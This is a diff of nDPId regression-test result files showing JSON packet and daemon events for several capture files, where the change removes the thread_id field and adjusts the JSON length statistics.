00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":7,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANEN1QAAtBpq0roEACsCoAGcAUMfjkVcfa3tFq0qAEAB6YUsAAAEBCAoroVwzABR97g=="} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANEN1QAAtBpq0roEACsCoAGcAUMfjkVcfa3tFq0qAEAB6YUsAAAEBCAoroVwzABR97g=="}
00210{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"thread_id":0,"packet_id":7,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365913} 00196{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"packet_id":7,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365913}
02285{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":8,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1492,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1492,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAF1EN2QAAtBpUTroEACsCoAGcAUMfjkVcfa3tFq0qAEAB6GowAAAEBCAoroVxpABR97khUVFAvMS4xIDIwMCBPSw0KU2VydmVyOiBuZ2lueA0KRGF0ZTogVHVlLCAxOCBBcHIgMjAxNyAxMjoxOToyNSBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PVVURi04DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpYLVBvd2VyZWQtQnk6IFBIUC81LjMuMw0KQ29udGVudC1MZW5ndGg6IDIxODcNCg0KPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4KPGltc2dzPgo8dGltZXN0YW1wPjEzNTgyNzg0NTA8L3RpbWVzdGFtcD4KPGZyZXF1ZW50bHlfc2hvdz4zPC9mcmVxdWVudGx5X3Nob3c+CjxmcmVxdWVudGx5X3Nob3dfZmlyc3Q+MzwvZnJlcXVlbnRseV9zaG93X2ZpcnN0Pgo8bWVzc2FnZV9saXN0PgoJPG1lc3NhZ2U+CgkJPGlkPjE4PC9pZD4KCQk8dGl0bGU+RnJvbSBCcnVubyBNYXJzIHRvIFJpaGFubmE8L3RpdGxlPgoJCTxkZXNjcmlwdGlvbj5QbGF5IHRoZSBob3R0ZXN0IHNvbmdzIGVmZm9ydGxlc3NseSBvbiB0aGUgIzEgcGlhbm8gYXBwITwvZGVzY3JpcHRpb24+CgkJPHVybD5odHRwOi8vYXBpLnNtdWxlLmNvbS92Mi9yZWRpcmVjdC9leUozWldKVmNtd2lPaUpvZEhSd09pOHZjR3hoZVM1bmIyOW5iR1V1WTI5dEwzTjBiM0psTDJGd2NITXZaR1YwWVdsc2N6OXBaRngxTURBelpHTnZiUzV6YlhWc1pTNXRZV2RwWTNCcFlXNXZJaXdpYlc5aWFXeGxWWEpzSWpvaWJXRnlhMlYwT2k4dlpHVjBZV2xzY3o5cFpGeDFNREF6WkdOdmJTNXpiWFZzWlM1dFlXZHBZM0JwWVc1dklpd2lZMkZ0Y0dGcFoyNUpaQ0k2TVRReU1pd2lZWEJ3SWpvaVRVbE9TVkJKUVU1UFgwRk9SRkpQU1VRaWZRPT08L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4zPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjIxNDUxMzc2MzQ8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KCTxtZXNzYWdlPgoJCTxpZD4xNzwvaWQ+CgkJPHRpdGxlPkRvd25sb2FkIFNpbmchIEthcmFva2UgZm9yIEZSRUU8L3RpdGxlPgoJCTxkZXNjcmlwdGlvbj5TaW5nIHNvbmdzIGJ5IDFELCBDYXJseSBSYWUgSmVwc2VuLCBCaWViZXIgJmFtcDsgbW9yZSE8L2Rlc2NyaXB0aW9uPgoJCTx1cmw+aHR0cDovL2FwaS5zbXVsZS5jb20vdjIvcmVkaXJlY3QvZXlKM1pXSlZjbXdpT2lKb2RIUndjem92TDNCc1lYa3VaMjl2WjJ4bExtTnZiUzl6ZEc5eVpTOWhjSEJ6TDJSbGRHRnBiSE0vYVdSY2RUQXdNMlJqYjIwdWMyMTFiR1V1YzJsdVoyRnVaSEp2YVdRaUxDSnRiMkpwYkdWVmNtd2lPaUp0WVhKclpYUTZMeTlrWlhSaGFXeHpQMmxrWEhVd01ETmtZMjl0TG5OdGRXeGxMbk5wYm1kaGJtUnliMmxrSWl3aVkyRnRjR0ZwWjI1SlpDSTZNVEV4T0N3aVlYQndJam9pVTBsT1IxOUhUMDlIVEVVaWZRPT08L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4xPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjY3NzM5MA=="} 02271{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1492,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1492,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAF1EN2QAAtBpUTroEACsCoAGcAUMfjkVcfa3tFq0qAEAB6GowAAAEBCAoroVxpABR97khUVFAvMS4xIDIwMCBPSw0KU2VydmVyOiBuZ2lueA0KRGF0ZTogVHVlLCAxOCBBcHIgMjAxNyAxMjoxOToyNSBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PVVURi04DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpYLVBvd2VyZWQtQnk6IFBIUC81LjMuMw0KQ29udGVudC1MZW5ndGg6IDIxODcNCg0KPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4KPGltc2dzPgo8dGltZXN0YW1wPjEzNTgyNzg0NTA8L3RpbWVzdGFtcD4KPGZyZXF1ZW50bHlfc2hvdz4zPC9mcmVxdWVudGx5X3Nob3c+CjxmcmVxdWVudGx5X3Nob3dfZmlyc3Q+MzwvZnJlcXVlbnRseV9zaG93X2ZpcnN0Pgo8bWVzc2FnZV9saXN0PgoJPG1lc3NhZ2U+CgkJPGlkPjE4PC9pZD4KCQk8dGl0bGU+RnJvbSBCcnVubyBNYXJzIHRvIFJpaGFubmE8L3RpdGxlPgoJCTxkZXNjcmlwdGlvbj5QbGF5IHRoZSBob3R0ZXN0IHNvbmdzIGVmZm9ydGxlc3NseSBvbiB0aGUgIzEgcGlhbm8gYXBwITwvZGVzY3JpcHRpb24+CgkJPHVybD5odHRwOi8vYXBpLnNtdWxlLmNvbS92Mi9yZWRpcmVjdC9leUozWldKVmNtd2lPaUpvZEhSd09pOHZjR3hoZVM1bmIyOW5iR1V1WTI5dEwzTjBiM0psTDJGd2NITXZaR1YwWVdsc2N6OXBaRngxTURBelpHTnZiUzV6YlhWc1pTNXRZV2RwWTNCcFlXNXZJaXdpYlc5aWFXeGxWWEpzSWpvaWJXRnlhMlYwT2k4dlpHVjBZV2xzY3o5cFpGeDFNREF6WkdOdmJTNXpiWFZzWlM1dFlXZHBZM0JwWVc1dklpd2lZMkZ0Y0dGcFoyNUpaQ0k2TVRReU1pd2lZWEJ3SWpvaVRVbE9TVkJKUVU1UFgwRk9SRkpQU1VRaWZRPT08L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4zPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjIxNDUxMzc2MzQ8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KCTxtZXNzYWdlPgoJCTxpZD4xNzwvaWQ+CgkJPHRpdGxlPkRvd25sb2FkIFNpbmchIEthcmFva2UgZm9yIEZSRUU8L3RpdGxlPgoJCTxkZXNjcmlwdGlvbj5TaW5nIHNvbmdzIGJ5IDFELCBDYXJseSBSYWUgSmVwc2VuLCBCaWViZXIgJmFtcDsgbW9yZSE8L2Rlc2NyaXB0aW9uPgoJCTx1cmw+aHR0cDovL2FwaS5zbXVsZS5jb20vdjIvcmVkaXJlY3QvZXlKM1pXSlZjbXdpT2lKb2RIUndjem92TDNCc1lYa3VaMjl2WjJ4bExtTnZiUzl6ZEc5eVpTOWhjSEJ6TDJSbGRHRnBiSE0vYVdSY2RUQXdNMlJqYjIwdWMyMTFiR1V1YzJsdVoyRnVaSEp2YVdRaUxDSnRiMkpwYkdWVmNtd2lPaUp0WVhKclpYUTZMeTlrWlhSaGFXeHpQMmxrWEhVd01ETmtZMjl0TG5OdGRXeGxMbk5wYm1kaGJtUnliMmxrSWl3aVkyRnRjR0ZwWjI1SlpDSTZNVEV4T0N3aVlYQndJam9pVTBsT1IxOUhUMDlIVEVVaWZRPT08L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4xPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjY3NzM5MA=="}
00210{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"thread_id":0,"packet_id":8,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365968} 00196{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"packet_id":8,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365968}
01599{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":981,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":981,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAD1UN3QAAtBpcRroEACsCoAGcAUMfjkVclC3tFq0qAGAB6wJEAAAEBCAoroVxpABR97jQ8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KCTxtZXNzYWdlPgoJCTxpZD4yMDwvaWQ+CgkJPHRpdGxlPkEgUGVwIFRhbGsgZnJvbSBLaWQgUHJlc2lkZW50ITwvdGl0bGU+CgkJPGRlc2NyaXB0aW9uPldhdGNoIHRoZSBuZXdlc3QgdmlkZW8gZnJvbSBUaGUgR3JlZ29yeSBCcm90aGVycywgYW5kIHBlcmZvcm0geW91ciBvd24gcmVuZGl0aW9uITwvZGVzY3JpcHRpb24+CgkJPHVybD5odHRwOi8vd3d3LnlvdXR1YmUuY29tL3dhdGNoP3Y9bkZHY3JZUGRySlU8L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4xPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjIxNDYzNTQyNDg8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KCTxtZXNzYWdlPgoJCTxpZD4yMTwvaWQ+CgkJPHRpdGxlPlJhcCBsaWtlIEVtaW5lbSE8L3RpdGxlPgoJCTxkZXNjcmlwdGlvbj5BdXRvUmFwIHR1cm5zIHNwZWVjaCBpbnRvIHJhcCAoYW5kIGNvcnJlY3RzIGJhZCByYXBwaW5nKS48L2Rlc2NyaXB0aW9uPgoJCTx1cmw+aHR0cDovL2FwaS5zbXVsZS5jb20vdjIvcmVkaXJlY3QvZXlKM1pXSlZjbXdpT2lKb2RIUndjem92TDNCc1lYa3VaMjl2WjJ4bExtTnZiUzl6ZEc5eVpTOWhjSEJ6TDJSbGRHRnBiSE0vYVdSY2RUQXdNMlJqYjIwdWMyMTFiR1V1WVhWMGIzSmhjQ0lzSW0xdlltbHNaVlZ5YkNJNkltMWhjbXRsZERvdkwyUmxkR0ZwYkhNL2FXUmNkVEF3TTJSamIyMHVjMjExYkdVdVlYVjBiM0poY0NJc0ltTmhiWEJoYVdkdVNXUWlPakUxTVRNc0ltRndjQ0k2SWtGVlZFOVNRVkJmUjA5UFJ5Sjk8L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4zPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjIxNDYwNzU0MDI8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KPC9tZXNzYWdlX2xpc3Q+CjwvaW1zZ3M+"} 01585{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":981,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":981,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAD1UN3QAAtBpcRroEACsCoAGcAUMfjkVclC3tFq0qAGAB6wJEAAAEBCAoroVxpABR97jQ8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KCTxtZXNzYWdlPgoJCTxpZD4yMDwvaWQ+CgkJPHRpdGxlPkEgUGVwIFRhbGsgZnJvbSBLaWQgUHJlc2lkZW50ITwvdGl0bGU+CgkJPGRlc2NyaXB0aW9uPldhdGNoIHRoZSBuZXdlc3QgdmlkZW8gZnJvbSBUaGUgR3JlZ29yeSBCcm90aGVycywgYW5kIHBlcmZvcm0geW91ciBvd24gcmVuZGl0aW9uITwvZGVzY3JpcHRpb24+CgkJPHVybD5odHRwOi8vd3d3LnlvdXR1YmUuY29tL3dhdGNoP3Y9bkZHY3JZUGRySlU8L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4xPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjIxNDYzNTQyNDg8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KCTxtZXNzYWdlPgoJCTxpZD4yMTwvaWQ+CgkJPHRpdGxlPlJhcCBsaWtlIEVtaW5lbSE8L3RpdGxlPgoJCTxkZXNjcmlwdGlvbj5BdXRvUmFwIHR1cm5zIHNwZWVjaCBpbnRvIHJhcCAoYW5kIGNvcnJlY3RzIGJhZCByYXBwaW5nKS48L2Rlc2NyaXB0aW9uPgoJCTx1cmw+aHR0cDovL2FwaS5zbXVsZS5jb20vdjIvcmVkaXJlY3QvZXlKM1pXSlZjbXdpT2lKb2RIUndjem92TDNCc1lYa3VaMjl2WjJ4bExtTnZiUzl6ZEc5eVpTOWhjSEJ6TDJSbGRHRnBiSE0vYVdSY2RUQXdNMlJqYjIwdWMyMTFiR1V1WVhWMGIzSmhjQ0lzSW0xdlltbHNaVlZ5YkNJNkltMWhjbXRsZERvdkwyUmxkR0ZwYkhNL2FXUmNkVEF3TTJSamIyMHVjMjExYkdVdVlYVjBiM0poY0NJc0ltTmhiWEJoYVdkdVNXUWlPakUxTVRNc0ltRndjQ0k2SWtGVlZFOVNRVkJmUjA5UFJ5Sjk8L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4zPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjIxNDYwNzU0MDI8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KPC9tZXNzYWdlX2xpc3Q+CjwvaW1zZ3M+"}
00210{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365968} 00196{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365968}
00491{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":21,"global_ts_msec":1492518365968} 00491{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":21,"global_ts_msec":1492518365968}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 9/0 ~~ packets captured/processed: 9/0
@@ -31,6 +31,6 @@
~~ total memory freed........: 4678926 bytes ~~ total memory freed........: 4678926 bytes
~~ total allocations/frees...: 101140/101140 ~~ total allocations/frees...: 101140/101140
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 215 chars ~~ json string min len.......: 201 chars
~~ json string max len.......: 2290 chars ~~ json string max len.......: 2276 chars
~~ json string avg len.......: 1230 chars ~~ json string avg len.......: 1216 chars

36196
test/results/ip_fragmented_garbage.pcap.out
View File

File diff suppressed because it is too large Load Diff

14
test/results/ipv6_in_gtp.pcap.out
View File

@@ -1,10 +1,10 @@
00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ipv6_in_gtp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ipv6_in_gtp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00469{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ipv6_in_gtp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1536839120404} 00469{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ipv6_in_gtp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1536839120404}
00482{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1,"source":"ipv6_in_gtp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":150,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":150,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAACNLNUB8pWgQAMoYEAYAUIAEVoAIBoSQAA\/xHueQruUBoK7v5LCGgIaABsAAAw\/wBcEoCPuGAIuFIANBFAJgf8IEBSA55JCupNF\/7gnP0Al2q8Zxk+AAAAAAAAAAe\/4GQ6ADQ3SIBuFZfDWsIvMrWrNfP4Fx5OYe4CUCXgPs5ziPlz8hT\/27dLl2xtqJbPLkrE"} 00468{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"ipv6_in_gtp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":150,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":150,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAACNLNUB8pWgQAMoYEAYAUIAEVoAIBoSQAA\/xHueQruUBoK7v5LCGgIaABsAAAw\/wBcEoCPuGAIuFIANBFAJgf8IEBSA55JCupNF\/7gnP0Al2q8Zxk+AAAAAAAAAAe\/4GQ6ADQ3SIBuFZfDWsIvMrWrNfP4Fx5OYe4CUCXgPs5ziPlz8hT\/27dLl2xtqJbPLkrE"}
00202{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1,"source":"ipv6_in_gtp.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1536839120404} 00188{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1,"source":"ipv6_in_gtp.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1536839120404}
00469{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":2,"source":"ipv6_in_gtp.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":5,"global_ts_msec":1536840494424} 00469{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":2,"source":"ipv6_in_gtp.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":5,"global_ts_msec":1536840494424}
00505{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2,"source":"ipv6_in_gtp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":166,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":166,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABNLNUB8pVgQAMn4EAQAIIAEVYAJD2QgAA\/xGMPAruJFwK7v5NCGgIaAB8AAAw\/wBsB0wVsGANtkgARDJAKgEEyMAUFE4AAQAClFtnYSoBBMjwAA9JAAAAAAAAAAT\/O2YDAAAAQhlm1OFxgeTba50SyREjm3lFbPc9lgrLUcRYebJHYlYzSCeWv2L\/IjSAXfS1U+Rh4DDxR7yVXb8kOaI3Xg=="} 00491{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"ipv6_in_gtp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":166,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":166,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABNLNUB8pVgQAMn4EAQAIIAEVYAJD2QgAA\/xGMPAruJFwK7v5NCGgIaAB8AAAw\/wBsB0wVsGANtkgARDJAKgEEyMAUFE4AAQAClFtnYSoBBMjwAA9JAAAAAAAAAAT\/O2YDAAAAQhlm1OFxgeTba50SyREjm3lFbPc9lgrLUcRYebJHYlYzSCeWv2L\/IjSAXfS1U+Rh4DDxR7yVXb8kOaI3Xg=="}
00202{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2,"source":"ipv6_in_gtp.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1536840494424} 00188{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2,"source":"ipv6_in_gtp.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1536840494424}
00471{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"ipv6_in_gtp.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":8,"global_ts_msec":1536840494424} 00471{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"ipv6_in_gtp.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":8,"global_ts_msec":1536840494424}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 2/0 ~~ packets captured/processed: 2/0
@@ -18,6 +18,6 @@
~~ total memory freed........: 4678926 bytes ~~ total memory freed........: 4678926 bytes
~~ total allocations/frees...: 101140/101140 ~~ total allocations/frees...: 101140/101140
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 207 chars ~~ json string min len.......: 193 chars
~~ json string max len.......: 510 chars ~~ json string max len.......: 496 chars
~~ json string avg len.......: 358 chars ~~ json string avg len.......: 345 chars

50
test/results/ja3_lots_of_cipher_suites.pcap.out
View File

@@ -1,27 +1,27 @@
00476{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00476{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00483{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1557818846743} 00483{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1557818846743}
00389{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":74,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":74,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABsKp3tUhAgQAAXYEAAQIIAEUAADTDSUAAPwad0wrOgxIKzkH55SEBu84u1gAAAAAAgAJyEJdSAAACBAW0AQEEAgEDAwI="} 00375{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":74,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":74,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABsKp3tUhAgQAAXYEAAQIIAEUAADTDSUAAPwad0wrOgxIKzkH55SEBu84u1gAAAAAAgAJyEJdSAAACBAW0AQEEAgEDAwI="}
00216{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846743} 00202{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846743}
